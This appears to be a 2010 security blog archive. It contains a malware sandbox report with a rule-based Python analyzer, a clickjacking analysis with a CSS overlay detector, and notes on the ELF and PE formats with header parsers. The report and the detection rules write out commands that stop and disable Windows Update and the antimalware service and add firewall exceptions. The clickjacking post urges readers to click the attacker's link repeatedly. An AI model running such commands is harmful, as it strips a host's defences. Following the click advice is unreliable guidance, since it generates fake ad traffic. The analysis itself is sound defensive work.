* Injects code into process "nvsvc32.exe".
* Injects code into process "iexplore.exe".
* Creates a mutex "Shell.CMruPidlList".
* Creates process "(null),net stop wuauserv,(null)".
* Creates a mutex "RasPbFile".
* Creates a mutex "ZonesCounterMutex".
* Creates a mutex "ZonesCacheCounterMutex".
* Creates a mutex "ZonesLockedCacheCounterMutex".
* Creates process "(null),net stop MsMpSvc,(null)".
* Enumerates running processes.
* Creates process "(null),sc config wuauserv start= disabled,(null)".
* Opens a service named "RASMAN".
* Creates process "(null),sc config MsMpSvc start= disabled,(null)".
* Injects code into process "sc.exe".
* Creates process "(null),net1 stop wuauserv,(null)".
* Creates process "(null),net1 stop MsMpSvc,(null)".
* Opens a service named "wuauserv".
* Opens a service named "MsMpSvc".
* Lists all entry names in a remote access phone book.
* Injects code into process "netsh.exe".
* Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Opens a service named "NapAgent".
* Creates a mutex "_!SHMSFTHISTORY!_".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121420101215!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121320101220!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121620101217!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010122020101221!".
* Creates a mutex "HGFSMUTEX".
* Opens a service named "WebClient".
* Creates a mutex "Global\winlogon: Logon UserProfileMapping Mutex".
* Creates a mutex "_SHuassist.mtx".
* Opens a service named "AudioSrv".
* Creates a mutex "MidiMapper_modLongMessage_RefCnt".
* Creates a mutex "MidiMapper_Configure".
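The report above is long, and most of it is noise (IE cache entries, window placement, UserAssist counters). As an added example that is not part of the original post, the script below runs a handful of detection rules over an excerpt of the report's own lines (copied verbatim into REPORT) and reduces them to the behaviours an analyst actually cares about: Run-key persistence, the vendor-sounding binary dropped straight into C:\windows, Windows Update and the Microsoft Antimalware service being stopped and disabled, the firewall whitelist entry, process injection, and the connection on a non-web port. The tactic labels are informal and the regular expressions are tuned to this report's format.

```python
import re
from collections import Counter

# Services whose shutdown is a defence-evasion signal rather than housekeeping.
SECURITY_SERVICES = {"wuauserv": "Windows Update", "msmpsvc": "Microsoft Antimalware Service"}

RUN_KEY = re.compile(r'Creates value "([^"=]+)=([^"]+)" in key (.+\\CurrentVersion\\Run)$', re.I)
SVC_START = re.compile(r'Modifies value "Start=0*([0-9a-f]+)" in key .*\\Services\\([^\\\s"]+)$', re.I)
PROCESS = re.compile(r'Creates process "([^,"]*),([^,"]*),([^"]*)"', re.I)
NET_STOP = re.compile(r"net1? stop (\S+)$", re.I)
SC_DISABLE = re.compile(r"sc config (\S+) start= disabled$", re.I)
FIREWALL_KEY = re.compile(r"FirewallPolicy\\\w+\\AuthorizedApplications", re.I)
INJECT = re.compile(r'Injects code into process "([^"]+)"', re.I)
CONNECT = re.compile(r'Connects to "([\d.]+)" on port (\d+) \((\w+)', re.I)
HIDDEN_EXE = re.compile(r"Creates file \(hidden\) (\S+\.exe)$", re.I)
WINDIR_ROOT_EXE = re.compile(r"^[a-z]:\\windows\\[^\\]+\.exe$", re.I)


def analyze_report(report):
    """Map sandbox report lines to (tactic, detail) findings."""
    findings = []
    for raw in report.splitlines():
        line = raw.strip().lstrip("* ").rstrip(".")
        if m := RUN_KEY.search(line):
            name, path, key = m.groups()
            hive = key.split("\\", 1)[0]
            findings.append(("persistence", f"{hive} Run value '{name}' launches {path}"))
            if WINDIR_ROOT_EXE.match(path):
                findings.append(("masquerading", f"'{name}' points at {path}: a vendor-sounding name dropped straight into the Windows directory"))
        elif m := SVC_START.search(line):
            start, svc = m.groups()
            if int(start, 16) == 4:                       # SERVICE_DISABLED
                findings.append(("defense-evasion", f"service {svc} ({SECURITY_SERVICES.get(svc.lower(), 'unknown role')}) disabled via registry Start=4"))
        elif FIREWALL_KEY.search(line):
            findings.append(("firewall", "authorized-application entry written under the Windows Firewall policy key"))
        elif m := PROCESS.search(line):
            image, cmd, _ = m.groups()
            cmd = cmd if cmd != "(null)" else image        # the tool logs image and command line separately
            if s := NET_STOP.match(cmd):
                findings.append(("defense-evasion", f"stops service {s.group(1)} ({SECURITY_SERVICES.get(s.group(1).lower(), 'unknown role')})"))
            elif s := SC_DISABLE.match(cmd):
                findings.append(("defense-evasion", f"sets service {s.group(1)} to disabled via sc"))
            elif cmd.lower().startswith("netsh firewall add allowedprogram"):
                findings.append(("firewall", f"firewall exception added: {cmd}"))
        elif m := INJECT.search(line):
            findings.append(("injection", f"code injected into {m.group(1)}"))
        elif m := CONNECT.search(line):
            ip, port, proto = m.groups()
            if int(port) not in (80, 443):
                findings.append(("c2", f"{ip}:{port}/{proto} on a non-web port; worth a protocol check"))
        elif m := HIDDEN_EXE.search(line):
            findings.append(("dropper", f"hidden executable written: {m.group(1)}"))
    return findings


def summarize(findings):
    """Count findings per tactic."""
    return Counter(tactic for tactic, _ in findings)


# Excerpt of the report above, copied line for line (constructed only in the
# sense that the rest of the report was left out).
REPORT = r"""
* Creates file (hidden) C:\windows\nvsvc32.exe
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
* Creates value "image96523489.exe=c:\windows\nvsvc32.exe:*:Enabled:NVIDIA driver monitor" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrator\Desktop
* Modifies value "Start=00000004" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\wuauserv
* Creates process "(null),net stop ,(null)".
* Creates process "(null),net stop MsMpSvc,(null)".
* Creates process "(null),sc config wuauserv start= disabled,(null)".
* Creates process "(null),netsh firewall add allowedprogram 1.exe 1 ENABLE,(null)".
* Creates process "c:\windows\nvsvc32.exe,(null),c:\windows".
* Injects code into process "explorer.exe".
* Connects to "174.37.200.82" on port 80 (TCP - HTTP).
* Connects to "205.234.253.15" on port 1234 (TCP).
"""

if __name__ == "__main__":
    found = analyze_report(REPORT)
    for tactic, detail in found:
        print(f"[{tactic}] {detail}")
    print(dict(summarize(found)))
```

Twelve findings come out of thirteen lines; the empty `net stop` and the plain port-80 downloads are correctly ignored. The same rules, pointed at a live host instead of a report, would read the Run keys, the `Start` values of wuauserv and MsMpSvc and the firewall `AuthorizedApplications` list directly.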

## Friday, December 17, 2010

### My First Book.

Alright,
most of my readers know that I am writing a book. That's true: I have been asked to write a book on security. It's a huge process, believe me... I would never have believed how much work it is....

Yesterday a book titled "Designing A New Electronic Voting System: Towards electronic voting systems" appeared on amazon.com with my name on it.

This is not the book I am talking about (as many of you emailed me to ask). It is just an old publication of mine that suddenly became a book ... (with my permission, of course).

You might say: alright Marco, so what is this blog post about? It is to make clear, publicly, that this is not the security book I am preparing, so stay tuned; it could appear soon ;)

## Tuesday, December 14, 2010

### Facebook Clickjacking: A Deep Analysis of the "Sexy Girl".

This afternoon I found this post in my news feed: "A sexy girl is playing with the Nintendo Wii.. let's see what happened next!". I was pretty curious to click on it, because I knew this social engineering trap. It is a classic one ;).

So let's right-click on it and copy the link. Then paste the grabbed link into an empty browser tab and go see what happens! The crafted page looks very close to the original YouTube one, except for the URL (of course!).

If you go to its address (http://www.assurdo.info/w/wii.php) you can easily spot some inconsistencies: the loading bar appears half loaded as soon as you open the attacker's link, the controls (Play, Stop, Pause) don't work at all (of course: it's a simple image!) and an unusual sentence says: "To play the video click Here". Here we go... another clickjacking site! I have already written about clickjacking in several forums, blogs, etc. If you are not familiar with this technique please read my latest paper on the topic here.

Right-click on the page and ..... a JavaScript snippet disables the right click; obviously they don't want us to read their code ;). Using the browser's view-source capability, let's see what the attacker wrote into the page. The following image shows the first half of the page code. A Google Analytics account (UA-18918796-1) is present on the page: the attacker wants to keep track of how many people have been clickjacked through it. An external stylesheet called "foglio.css" is linked. Looking into foglio.css we see the page manipulation, done as usual with z-index and opacity, nothing really new.

Continuing through the main HTML code, we reach the core of the attack. The following image shows the second half of the page.
A classic iframe is used to hide the page in the background. I built the same example on the DEISNET page; please take a look at it to fully understand how the iframe hides the background page.

The most interesting part is the external JavaScript called awe.js. Basically the page intercepts your click on the fake "Play" button placed in the middle of the screen, triggering the JavaScript code. That code checks whether you have already visited the following page (http://bit.ly/fCT54Z), which after 3 redirects resolves to a simple mymatch registration form. If you had already visited it, it does nothing; if not, it makes you visit it and then sets a cookie so that you do not visit the page again. This prevents Google or other advertising companies from suspecting that somebody is abusing the ad services through an HTTP proxy.

This trick is widely used in underground communities to obtain fake clicks and make money from pay-per-click services. The script itself does nothing directly harmful to the victim, but it forces you to open a page, generating traffic, clicks and page impressions on a URL you would never have clicked. Google and other advertising companies profile click behavior, and this technique is the most common way to defraud those services, since each victim clicks only once and the resulting click statistics look like normal behavior.

So if you fell for this attack don't worry; you don't need to change your password, you have just contributed to a click fraud.

A possible way to counterattack is to click several times on the link the attacker used (http://bit.ly/fCT54Z). By clicking on it voluntarily you change the "normal clicking behavior", which means Google and other ad services will close the attacker's ad account. Now it's up to you ;)
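The CSS trick mentioned above (an iframe taken out of normal flow, stacked above the decoy with z-index and made transparent with opacity) can be spotted mechanically. As an added example that is not part of the original post and has nothing to do with the attacker's actual foglio.css, here is a small stylesheet parser plus a heuristic that flags selectors combining absolute or fixed positioning, a positive z-index and (near-)zero opacity, including the legacy IE `filter: alpha(opacity=0)` form. SAMPLE_CSS is constructed in the style of such a kit.

```python
import re

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
DECL_RE = re.compile(r"\s*([a-zA-Z-]+)\s*:\s*([^;]+?)\s*(?:;|$)")


def parse_css(css):
    """Flat stylesheet -> {selector: {property: value}}. Comments are dropped;
    @-rules, nesting and !important are out of scope for this check."""
    rules = {}
    for m in RULE_RE.finditer(COMMENT_RE.sub("", css)):
        decls = {p.lower(): v.strip().lower() for p, v in DECL_RE.findall(m.group(2))}
        for selector in (s.strip() for s in m.group(1).split(",")):
            if selector:
                rules.setdefault(selector, {}).update(decls)
    return rules


def number(value, default):
    """Leading numeric part of a CSS value ("10", "0.95", "640px"), else default."""
    m = re.match(r"-?\d+(?:\.\d+)?", value or "")
    return float(m.group()) if m else default


def overlay_candidates(rules, max_opacity=0.1):
    """Selectors styled like a clickjacking overlay: out of normal flow, stacked
    above the decoy (positive z-index) and (nearly) invisible. Returns
    (selector, z-index, opacity) tuples."""
    hits = []
    for selector, d in rules.items():
        positioned = d.get("position") in ("absolute", "fixed")
        z = number(d.get("z-index"), 0)
        opacity = number(d.get("opacity"), 1.0)
        legacy = re.search(r"alpha\(opacity=(\d+)\)", d.get("filter", ""))  # old IE syntax
        if legacy:
            opacity = min(opacity, int(legacy.group(1)) / 100)
        if positioned and z > 0 and opacity <= max_opacity:
            hits.append((selector, z, opacity))
    return hits


# Constructed stylesheet in the style of such a kit (not the real foglio.css).
SAMPLE_CSS = """
/* fake player: visible decoy below, invisible target iframe on top */
#decoy { position: relative; z-index: 1; width: 640px; height: 390px; }
#decoy .play { position: absolute; top: 170px; left: 290px; }
#target { position: absolute; top: 0; left: 0; z-index: 10; opacity: 0; filter: alpha(opacity=0); width: 640px; height: 390px; }
.tooltip, .badge { position: absolute; z-index: 5; opacity: 0.95; }
"""

if __name__ == "__main__":
    for selector, z, opacity in overlay_candidates(parse_css(SAMPLE_CSS)):
        print(f"{selector}: z-index {z:g}, opacity {opacity:g}")
```

Only `#target` is reported: the decoy's play button is positioned too, but it is opaque and sits below, and the tooltips are transparent-ish but nowhere near invisible. A heuristic like this is what a crawler or browser extension would apply to a stylesheet before looking at what the flagged element actually frames.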

## Thursday, December 9, 2010

Hi Folks,
after the previous post on Windows COFF, namely Microsoft PE, this post comes naturally. Today I am going to write down some notes of mine on the Executable and Linking Format (ELF). ELF was originally developed by UNIX System Laboratories (USL) as part of the Application Binary Interface (ABI). It was selected by the Tool Interface Standards (TIS) committee as the portable object file format for the 32-bit Intel Architecture.

ELF is structured as follows:

An ELF header resides at the beginning and holds a "road map" describing the file's organization. Sections hold the bulk of object file information for the linking view: instructions, data, symbol table, relocation information, and so on. (Descriptions of special sections appear later in Part 1 of the specification; Part 2 discusses segments and the program execution view of the file.) A program header table, if present, tells the system how to create a process image. Files used to build a process image (execute a program) must have a program header table; relocatable files do not need one. A section header table contains information describing the file's sections. Every section has an entry in the table; each entry gives information such as the section name, the section size, etc. Files used during linking must have a section header table; other object files may or may not have one.

Being very quick and dirty on the header description, we can say that some object file control structures can grow, because the ELF header contains their actual sizes. If the object file format changes, a program may encounter control structures that are larger or smaller than expected. The ELF header is structured as follows (click to make it bigger):

e_ident: The initial bytes mark the file as an object file and provide machine-independent data with which to decode and interpret the file's contents. Complete descriptions appear in the "ELF Identification" part of the specification.

e_type: This member identifies the object file type.

e_machine: This member’s value specifies the required architecture for an individual file.

e_version: This member identifies the object file version (The value 1 signifies the original file format; extensions will create new versions with higher numbers.)

e_entry: This member gives the virtual address to which the system first transfers control, thus starting the process. If the file has no associated entry point, this member holds zero.

e_phoff: This member holds the program header table’s file offset in bytes. If the file has no program header table, this member holds zero.

e_shoff: This member holds the section header table’s file offset in bytes. If the file has no section header table, this member holds zero.

e_flags: This member holds processor-specific flags associated with the file. Flag names take the form EF_machine_flag. See ‘‘Machine Information’’ for flag definitions.

e_ehsize: This member holds the ELF header’s size in bytes.

e_phentsize: This member holds the size in bytes of one entry in the file's program header table; all entries are the same size.

e_phnum: This member holds the number of entries in the program header table. Thus the product of e_phentsize and e_phnum gives the table's size in bytes. If a file has no program header table, e_phnum holds the value zero.

e_shentsize: This member holds a section header's size in bytes. A section header is one entry in the section header table; all entries are the same size.

e_shnum: This member holds the number of entries in the section header table. Thus the product of e_shentsize and e_shnum gives the section header table's size in bytes. If a file has no section header table, e_shnum holds the value zero.

Alright, this was kind of cool, but how can we play with that? First of all, how can we know that a file is an ELF? And how can we extract data and information from an ELF file? Is there something like PEdit?

Let's start with the following example "test.c" (`$ gcc -o test test.c`):

```
$ readelf -h test
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x80482c0
  Start of program headers:          52 (bytes into file)
  Start of section headers:          2060 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         7
  Size of section headers:           40 (bytes)
  Number of section headers:         28
  Section header string table index: 25
```

What does this header tell us?

1) This executable was created for the Intel x86 32-bit architecture ("Machine" and "Class" fields).

2) When executed, the program will start running from virtual address 0x80482c0 (see "Entry point address"). The "0x" prefix means it is a hexadecimal number. This address doesn't point to our main() procedure, but to a procedure named _start. Don't remember creating such a thing? Of course you don't: _start is put there by the linker, and its purpose is to initialize your program before main() runs.

3) This program has a total of 28 sections and 7 segments.
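The header fields listed above, decoded the way readelf -h does it, as an added Python example (not the post's own code). The bytes are constructed by hand to carry the same values readelf printed for "test" (EXEC, Intel 80386, entry 0x80482c0, program headers at 52, section headers at 2060); no real file is read. The parser also handles ELFCLASS64 and big-endian objects, which the post does not cover, and uses e_ehsize the way the post says a reader should: the header carries its own size, so a value smaller than the fields just decoded is rejected.

```python
import struct

# Added example, not from the post: decode the ELF header and answer "is this file
# an ELF?". Sample bytes below are constructed to mirror the readelf -h output above.

ELF_MAGIC = b"\x7fELF"
ELF_TYPES = {0: "NONE", 1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
ELF_MACHINES = {3: "Intel 80386", 62: "Advanced Micro Devices X86-64"}
# Fields that follow the 16-byte e_ident, in file order (same names for ELF32 and ELF64).
FIELDS = ("e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize "
          "e_phentsize e_phnum e_shentsize e_shnum e_shstrndx").split()
# struct layouts for ELFCLASS32 (1) and ELFCLASS64 (2): e_entry/e_phoff/e_shoff widen to 8 bytes.
LAYOUT = {1: "HHIIIIIHHHHHH", 2: "HHIQQQIHHHHHH"}
ENDIAN = {1: "<", 2: ">"}  # ELFDATA2LSB, ELFDATA2MSB


def is_elf(data):
    """The first four e_ident bytes (0x7f 'E' 'L' 'F') identify an ELF object file."""
    return data[:4] == ELF_MAGIC


def parse_elf_header(data):
    """Return the ELF header as a dict; raise ValueError for anything that is not a sane header."""
    if not is_elf(data):
        raise ValueError("not an ELF file (bad magic)")
    ei_class, ei_data, ei_version = data[4], data[5], data[6]
    if ei_class not in LAYOUT or ei_data not in ENDIAN:
        raise ValueError("unsupported EI_CLASS/EI_DATA: %d/%d" % (ei_class, ei_data))
    if ei_version != 1:
        raise ValueError("unexpected EI_VERSION %d" % ei_version)
    fmt = ENDIAN[ei_data] + LAYOUT[ei_class]
    hdr_len = 16 + struct.calcsize(fmt)          # 52 for ELF32, 64 for ELF64
    if len(data) < hdr_len:
        raise ValueError("file too short for an ELF header")
    hdr = dict(zip(FIELDS, struct.unpack_from(fmt, data, 16)))
    hdr["class"] = 32 if ei_class == 1 else 64
    hdr["little_endian"] = ei_data == 1
    hdr["type_name"] = ELF_TYPES.get(hdr["e_type"], "unknown (0x%x)" % hdr["e_type"])
    hdr["machine_name"] = ELF_MACHINES.get(hdr["e_machine"], "unknown (0x%x)" % hdr["e_machine"])
    # The header states its own size: trust e_ehsize rather than a compiled-in struct size,
    # but a value smaller than the fields just read cannot be right.
    if hdr["e_ehsize"] < hdr_len:
        raise ValueError("e_ehsize %d is smaller than the header layout" % hdr["e_ehsize"])
    # Table sizes exactly as the post describes them: entry size times entry count.
    hdr["phtab_size"] = hdr["e_phentsize"] * hdr["e_phnum"]
    hdr["shtab_size"] = hdr["e_shentsize"] * hdr["e_shnum"]
    return hdr


def tables_in_bounds(hdr, file_size):
    """True when both header tables (where present) lie inside the file; a table that
    points past EOF means a truncated or deliberately malformed object."""
    for off, size in ((hdr["e_phoff"], hdr["phtab_size"]), (hdr["e_shoff"], hdr["shtab_size"])):
        if off and off + size > file_size:
            return False
    return True


def sample_elf32_header():
    """Constructed ELF32 header carrying the values readelf -h printed for 'test'."""
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\0" * 8  # class=32, LSB, version=1, SysV ABI
    return e_ident + struct.pack("<" + LAYOUT[1],
                                 2,           # e_type: EXEC
                                 3,           # e_machine: Intel 80386
                                 1,           # e_version
                                 0x80482c0,   # e_entry: _start, not main()
                                 52,          # e_phoff: program headers right after the header
                                 2060,        # e_shoff: section headers at 0x80c
                                 0,           # e_flags
                                 52, 32, 7,   # e_ehsize, e_phentsize, e_phnum
                                 40, 28, 25)  # e_shentsize, e_shnum, e_shstrndx


if __name__ == "__main__":
    hdr = parse_elf_header(sample_elf32_header())
    for name in FIELDS:
        print("%-12s 0x%x" % (name, hdr[name]))
    print("program header table: %d bytes, section header table: %d bytes"
          % (hdr["phtab_size"], hdr["shtab_size"]))
```

Run it and compare the printed fields with the readelf output above: e_shoff 2060 is the 0x80c that readelf -S reports, and e_shentsize times e_shnum (40 x 28) is the 1120 bytes the section header table occupies.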

What is a section? A section is an area in the object file that contains information which is useful for linking: the program's code, the program's data (variables, arrays, strings), relocation information and so on. So each area groups related information and has a distinct meaning: the code section only holds code, the data section only holds initialized or non-initialized data, etc. The Section Header Table (SHT) tells us exactly what sections the ELF object has, but just by looking at the "Number of section headers" field above you can tell that "test" contains 28 sections.

```
$ readelf -S test
There are 28 section headers, starting at offset 0x80c:

Section Headers:
  [Nr] Name      Type      Addr     Off    Size   ES Flg Lk Inf Al
  ........
  [ 4] .dynsym   DYNSYM    08048174 000174 000060 10   A  5   1  4
  ........
  [11] .plt      PROGBITS  08048290 000290 000030 04  AX  0   0  4
  [12] .text     PROGBITS  080482c0 0002c0 0001d0 00  AX  0   0  4
  ........
  [20] .got      PROGBITS  080495d8 0005d8 000004 04  WA  0   0  4
  [21] .got.plt  PROGBITS  080495dc 0005dc 000014 04  WA  0   0  4
  ........
  [22] .data     PROGBITS  080495f0 0005f0 000010 00  WA  0   0  4
  [23] .bss      NOBITS    08049600 000600 000008 00  WA  0   0  4
  ........
  [26] .symtab   SYMTAB    00000000 000c6c 000480 10     27  2c  4
  ........
```

The .text section is the place where the compiler puts the executable code. As a consequence, this section is marked as executable ("X" in the Flg field). In this section you will see the machine code of our main() procedure:

```
$ objdump -d -j .text test
```

-d tells objdump to disassemble the machine code and -j tells objdump to focus on a specific section only (in this case .text, but you can play with .bss, .stack, .data as well).

Mac OS X users can play with their binaries in the same way through otool (which reads the native Mach-O format rather than ELF), as follows (click to enlarge):

Showing Shared Libraries:

Showing .data area (local vars):
This "quick and dirty" post shows the basic ELF structure, with a particular focus on the ELF header, the first element the OS loader looks at. Some tools to play with have been presented. Keep in mind that those tools are very useful for the first analysis of a suspicious file such as malware, a virus, a keylogger, etc.

## Friday, December 3, 2010

Hi Folks, during the past days a couple of students asked me a question about the Windows PE header. Well, I supposed the PE was a "kind of" well known structure; instead, it seems to be pretty obscure to most people.

So I am going to summarize very, very briefly what PE is, giving some useful pictures harvested from here.

Each executable file follows a Common Object File Format (COFF) which the OS loader uses to run the program. Windows Portable Executable (PE) is one of the COFF variants available in today's operating systems; the Executable and Linkable Format (ELF) plays the same role on Linux.

Microsoft migrated to the PE format with the introduction of the Windows NT 3.1 operating system. All later versions of Windows, including Windows 95/98/ME, support the file structure. The format has retained limited legacy support to bridge the gap between DOS-based and NT systems. For example, PE/COFF headers still include an MS-DOS executable program, which is by default a stub that displays the simple message "This program cannot be run in DOS mode" (or similar). PE also continues to serve the changing Windows platform. Some extensions include the .NET PE format (see below), a 64-bit version called PE32+ (sometimes PE+), and a specification for Windows CE.

Nowadays the Windows PE header has the following structure (click to make it bigger).

MZ are the first 2 bytes you will see in any PE file opened in a hex editor. The DOS header occupies the first 64 bytes of the file, i.e. the first 4 rows seen in the hex editor in the picture below. The last DWORD of the DOS header, just before the DOS stub begins, contains 00h 01h 00h 00h (little-endian 100h), which is the file offset where the PE header begins.
The DOS stub is the piece of code that runs if the executable is started from a DOS environment (for example a DOS shell). For backward compatibility it usually does nothing more than print a message such as "This program must be run under Win32" and exit.

The PE header begins with its signature 50h, 45h, 00h, 00h (the letters "PE" followed by two terminating zeroes).
If in the Signature field of the PE header you find an NE signature rather than PE, you're working with a 16-bit Windows New Executable file. Likewise, an LE in the signature field would indicate a Windows 3.x virtual device driver (VxD), and an LX would be the mark of a file for OS/2 2.0. FileHeader is the next 20 bytes of the PE file and contains info about the physical layout and properties of the file, e.g. the number of sections. OptionalHeader is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file, e.g. AddressOfEntryPoint. Its size is given by a member of FileHeader. The structures of these members are also defined in windows.inc.
The PE header is defined as follows:

Not all of these sections must be present, but you need to update NumberOfSections whenever you add or delete sections in a PE file. The best way to analyze those sections is with PE Explorer or PEiD. The following image shows PEiD in use.

EntryPoint is the Relative Virtual Address (RVA) of the first instruction that will be executed when the PE loader is ready to run the PE file. If you want to divert the flow of execution right from the start, you need to change the value in this field to a new RVA, and the instruction at the new RVA will be executed first. Executable packers usually redirect this value to their decompression stub, after which execution jumps back to the original entry point of the app, the OEP. Of further note is the StarForce protection, in which the CODE section is not present in the file on disk but is written into virtual memory on execution.

ImageBase is the preferred load address for the PE file. For example, if the value in this field is 400000h, the PE loader will try to load the file into the virtual address space starting at 400000h. The word "preferred" means that the PE loader may not load the file at that address if some other module already occupied that address range. In 99% of cases it is 400000h.

SectionAlignment is the granularity of the alignment of the sections in memory. For example, if the value in this field is 4096 (1000h), each section must start at multiples of 4096 bytes. If the first section is at 401000h and its size is 10 bytes, the next section must be at 402000h even if the address space between 401000h and 402000h will be mostly unused.

FileAlignment is the granularity of the alignment of the sections in the file. For example, if the value in this field is 512 (200h), each section must start at multiples of 512 bytes. If the first section is at file offset 200h and the size is 10 bytes, the next section must be located at file offset 400h: the space between file offsets 522 and 1024 is unused/undefined.

SizeOfImage is the overall size of the PE image in memory. It's the sum of all headers and sections aligned to SectionAlignment.

SizeOfHeaders is the size of all headers + section table. In short, this value is equal to the file size minus the combined size of all sections in the file. You can also use this value as the file offset of the first section in the PE file.

DataDirectory is the final 128 bytes of OptionalHeader, which in turn is the final member of the PE header IMAGE_NT_HEADERS. DataDirectory is an array of 16 IMAGE_DATA_DIRECTORY structures, 8 bytes apiece, each relating to an important data structure in the PE file. Each array element refers to a predefined item, such as the import table. The structure has 2 members which contain the location and size of the data structure in question: VirtualAddress is the relative virtual address (RVA) of the data structure, and isize (Size) contains its size in bytes.
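The header walk described above (MZ, e_lfanew, the "PE" signature, FileHeader, OptionalHeader, section table) together with the field rules just listed (EntryPoint, ImageBase, SectionAlignment, FileAlignment, SizeOfImage, SizeOfHeaders, DataDirectory), as an added Python example that is neither the post's code nor Microsoft's. The image it parses is constructed by hand, contains no machine code, and uses the post's example values (ImageBase 400000h, SectionAlignment 1000h, FileAlignment 200h); `check_layout` turns the alignment and size statements above into checks that flag a header someone has edited inconsistently, and `rva_to_offset` does the RVA-to-file-offset mapping an analyst needs to find the bytes at the entry point on disk.

```python
import struct

# Added example, not code from the post or from Microsoft. Walks a PE32 image the way the
# post describes it and checks the alignment and size rules the post states. The image is
# constructed by hand (no machine code inside) from the post's example values.

DOS_MAGIC, PE_SIG = b"MZ", b"PE\0\0"
LEGACY_SIGS = {b"NE": "16-bit New Executable", b"LE": "Windows 3.x VxD", b"LX": "OS/2 2.0"}
SECTION_HDR = "<8sIIIIIIHHI"        # IMAGE_SECTION_HEADER, 40 bytes per section
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # bit in a section's Characteristics

def align_up(value, alignment):
    """Round value up to the next multiple of alignment (1000h, 200h, ...)."""
    return (value + alignment - 1) // alignment * alignment

def parse_pe32(data):
    """Header fields discussed in the post, as a dict; ValueError when the bytes are not a PE32."""
    if data[:2] != DOS_MAGIC:
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 60)[0]     # last DWORD of the 64-byte DOS header
    sig = data[e_lfanew:e_lfanew + 4]
    if sig != PE_SIG:
        raise ValueError("not PE: %r is %s" % (sig[:2], LEGACY_SIGS.get(sig[:2], "unknown")))
    fh = e_lfanew + 4                                    # IMAGE_FILE_HEADER, 20 bytes
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                        # IMAGE_OPTIONAL_HEADER
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 10Bh) handled here; 20Bh would be PE32+")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base, section_align, file_align = struct.unpack_from("<III", data, opt + 28)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    # DataDirectory: (VirtualAddress, Size) pairs, normally 16 of them, closing the optional header
    data_dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(min(n_dirs, 16))]
    sections = []
    for i in range(nsections):                           # section table follows OptionalHeader
        f = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1], "va": f[2],
                         "raw_size": f[3], "raw_ptr": f[4], "flags": f[9]})
    return {"machine": machine, "entry_rva": entry_rva, "image_base": image_base,
            "section_align": section_align, "file_align": file_align, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "data_dirs": data_dirs, "sections": sections}

def section_for_rva(pe, rva):
    """Section whose memory range covers rva (VirtualSize, or SizeOfRawData when it is zero), or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + (s["vsize"] or s["raw_size"]):
            return s
    return None

def rva_to_offset(pe, rva):
    """File offset of the bytes mapped at rva, e.g. the entry point's first instruction."""
    s = section_for_rva(pe, rva)
    if s is None:
        raise ValueError("RVA 0x%x lies in no section" % rva)
    return rva - s["va"] + s["raw_ptr"]

def check_layout(pe, file_size):
    """Rules from the post that the image breaks; an empty list means the headers are consistent."""
    problems = []
    expected_image = align_up(pe["size_of_headers"], pe["section_align"])
    for s in pe["sections"]:
        if s["va"] % pe["section_align"]:
            problems.append("%s: VirtualAddress not a multiple of SectionAlignment" % s["name"])
        if s["raw_ptr"] % pe["file_align"]:
            problems.append("%s: PointerToRawData not a multiple of FileAlignment" % s["name"])
        end = align_up(s["va"] + (s["vsize"] or s["raw_size"]), pe["section_align"])
        expected_image = max(expected_image, end)
    if expected_image != pe["size_of_image"]:
        problems.append("SizeOfImage 0x%x but aligned sections end at 0x%x" % (pe["size_of_image"], expected_image))
    if file_size - sum(s["raw_size"] for s in pe["sections"]) != pe["size_of_headers"]:
        problems.append("SizeOfHeaders is not file size minus the sections")
    entry = section_for_rva(pe, pe["entry_rva"])
    if entry is None or not entry["flags"] & IMAGE_SCN_MEM_EXECUTE:
        problems.append("entry point 0x%x is outside every executable section" % pe["entry_rva"])
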